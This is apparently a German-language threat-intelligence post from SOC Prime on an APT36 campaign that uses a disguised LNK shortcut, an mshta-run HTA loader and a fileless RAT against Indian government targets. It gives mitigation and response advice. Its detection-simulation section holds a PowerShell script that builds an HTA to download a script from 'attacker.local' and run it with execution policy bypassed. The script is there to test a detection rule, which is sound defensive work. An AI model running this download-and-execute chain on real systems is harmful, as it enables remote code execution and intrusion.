SOC Prime Bias: Kritisch

05 Jan 2026 15:57 UTC

APT36: Mehrstufige LNK-Malware-Kampagne, die sich gegen indische Regierungseinrichtungen richtet

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
APT36: Mehrstufige LNK-Malware-Kampagne, die sich gegen indische Regierungseinrichtungen richtet
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

APT36 (Transparent Tribe) führte eine Spear-Phishing-Kampagne durch, die eine bösartige LNK-Verknüpfung lieferte, die sich als PDF tarnt. Beim Öffnen startet die Verknüpfung mshta.exe um einen HTA-basierten Loader auszuführen, der Payloads im Speicher entschlüsselt und ausführt, einschließlich eines Konfigurationsmoduls und einer voll ausgestatteten RAT-DLL. Die Malware wählt dynamisch Persistenzmethoden basierend auf dem installierten Antivirenprodukt des Opfers und verbindet sich mit ihrem Command-and-Control-Server über einen verschlüsselten Kanal. Die Aktivität wird als spionagefokussiert bewertet, zielt auf indische Regierungs- und Bildungseinrichtungen ab, um Daten zu stehlen.

Untersuchung

Forscher analysierten die ungewöhnlich große LNK-Datei, verfolgten den eingebetteten HTA-Inhalt gehostet auf innlive.in, und reverse-engineerten die Entschlüsselungslogik. Die Kette offenbarte zwei primäre Phasen: eine .NET-Deserialisierungs-Payload, die genutzt wird, um Sicherheitsprüfungen zu schwächen oder zu umgehen, gefolgt von einer fileless bösartigen DLL (z.B. ki2mtmkl.dll / iinneldc.dll) mit RAT-Funktionalität. Persistenzverhalten wurde auf spezifische Antivirenprodukte abgebildet und wichtige C2-Details wie TCP-Port 8621 und ein AES-Schlüssel der für verschlüsselten Verkehr verwendet wird, wurden während der Analyse extrahiert.

Minderung

Einschränken oder Quarantäne von Verknüpfungs-(.lnk) Anhängen, die per E-Mail geliefert werden, insbesondere wenn sie in ZIP-Archiven gepackt sind. Anwendungssteuerungsrichtlinien anwenden, um die Ausführung von mshta.exe, PowerShell und anderen Skript-Engines von benutzerbeschreibbaren Pfaden aus zu begrenzen. Verwenden Sie Endpunkt-Erkennungen für Prozessketten, die mshta.exe und Anzeichen von In-Memory-DLL-Ausführungen beinhalten, und strenge Egress-Kontrollen durchsetzen, um Kommunikation mit unbekannten oder nicht vertrauenswürdigen Domains zu blockieren.

Reaktion

Wenn eine verdächtige LNK-Ausführung entdeckt wird, isolieren Sie das System, erfassen Sie Speicherabbilder und suchen Sie nach In-Memory-DLL-Indikatoren, die mit der RAT-Phase verbunden sind. Blockieren Sie identifizierte bösartige Domains und damit verbundene IP-Infrastrukturen, und rotieren Sie möglicherweise exponierte Anmeldedaten. Führen Sie eine forensische Überprüfung durch, um Persistenzartefakte im Startordner und in der Registry zu finden, entfernen Sie diese und validieren Sie, dass keine zusätzlichen Zugangspunkte verbleiben.

Angriffsfluss

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Preflight-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffs-Narrativ & Befehle:
    Ein Angreifer hat niedrigprivilegierten PowerShell-Zugriff auf eine kompromittierte Arbeitsstation erlangt. Um eine Remote-Payload auszuführen, ohne ein ausführbares Programm auf die Festplatte zu schreiben, verwendet der Angreifer mshta.exe um eine HTA-Datei auszuführen, die eine PowerShell-Hintertür von einem C2-Server zieht. Die Schritte sind:

    1. Ein minimales bösartiges HTA kodieren, das PowerShell startet, um eine Payload herunterzuladen und auszuführen.
    2. Hosten Sie das HTA auf einem Webserver (z.B. http://attacker.local/malicious.hta).
    3. Rufen Sie von der kompromittierten PowerShell-Sitzung mshta.exe mit der Remote-URL als Argument auf.

    Diese Kette erzeugt ein Prozesserstellungs Ereignis, bei dem mshta.exe das Kind von powershell.exeist, und es passt genau zur Sigma-Regel.

  • Regressionstest-Skript:

    #-------------------------------------------------
    # Simulierter Angreifer-Skript – löst die Regel aus
    #-------------------------------------------------
    
    # 1. Definieren Sie das bösartige HTA (inline für Demonstrationszwecke)
    $htaContent = @"
    <script>
        // Laden und führen Sie eine Dummy-PowerShell-Payload aus
        var url = 'http://attacker.local/payload.ps1';
        var xhr = new ActiveXObject('Microsoft.XMLHTTP');
        xhr.open('GET', url, false);
        xhr.send();
        var ps = new ActiveXObject('WScript.Shell');
        ps.Run('powershell -NoProfile -ExecutionPolicy Bypass -Command "' + xhr.responseText + '"', 0, false);
    </script>
    "@
    
    # 2. Schreiben Sie HTA an temporären Ort (simuliert eine gehostete Datei)
    $tempPath = "$env:TEMPmalicious.hta"
    $htaContent | Set-Content -Path $tempPath -Encoding ASCII
    
    # 3. Starten Sie mshta.exe von PowerShell aus (der Erkennungs-Trigger)
    $mshta = (Get-Command mshta.exe).Source
    Write-Host "[*] Starten von mshta.exe zur Ausführung der HTA-Payload..."
    Start-Process -FilePath $mshta -ArgumentList "`"$tempPath`"" -NoNewWindow
    
    # Optional: Schlaf, um das Ereignis erfassen zu lassen
    Start-Sleep -Seconds 5
    
    # Bereinigung (wird im nächsten Abschnitt behandelt)
  • Bereinigungskommandos:

    # Entfernen Sie temporäre HTA-Datei
    Remove-Item -Path "$env:TEMPmalicious.hta" -Force -ErrorAction SilentlyContinue
    
    # Stoppen von eventuell noch laufenden mshta.exe-Prozessen (unwahrscheinlich nach normaler Ausführung)
    Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force
    
    Write-Host "[*] Bereinigung abgeschlossen."